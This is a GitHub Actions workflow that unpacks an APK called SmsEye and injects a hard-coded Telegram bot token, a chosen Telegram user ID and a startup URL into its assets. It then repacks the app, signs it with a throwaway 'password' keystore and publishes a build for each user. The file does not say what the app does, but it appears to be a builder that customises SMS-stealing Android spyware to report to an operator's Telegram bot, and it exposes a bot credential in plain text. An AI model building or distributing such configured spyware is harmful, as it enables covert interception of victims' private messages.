name: Inject Telegram Info into SmsEye APK

on:
  workflow_dispatch:
    inputs:
      user_id:
        description: 'Telegram numeric user ID (for id.txt)'
        required: true
      app_url:
        description: 'Startup URL to inject (url.txt)'
        required: true

jobs:
  inject-assets:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repo
      uses: actions/checkout@v3

    - name: Install tools
      run: sudo apt install -y zipalign unzip default-jdk

    - name: Extract signed APK
      run: |
        mkdir working
        unzip -q SmsEye2_signed.apk -d working

    - name: Inject asset values
      run: |
        echo "8000560638:AAHrOlt9b4U-QKmgnuOBl7bDxGzuz2wGXi4" > working/assets/token.txt
        echo "${{ github.event.inputs.user_id }}" > working/assets/id.txt
        echo "${{ github.event.inputs.app_url }}" > working/assets/url.txt

    - name: Repack APK
      run: |
        cd working
        zip -qr ../unsigned.apk *
        cd ..

    - name: Sign the APK
      run: |
        zipalign -v 4 unsigned.apk aligned.apk
        keytool -genkey -v -keystore keystore.jks -storepass password -alias key0 -keypass password \
          -keyalg RSA -keysize 2048 -validity 10000 -dname "CN=SmsEyeAuto"
        jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 \
          -keystore keystore.jks -storepass password -keypass password aligned.apk key0
        mv aligned.apk SmsEye_Modified.apk

    - name: Upload final APK
      uses: actions/upload-artifact@v4
      with:
        name: SmsEye-Patched-${{ github.event.inputs.user_id }}
        path: SmsEye_Modified.apk
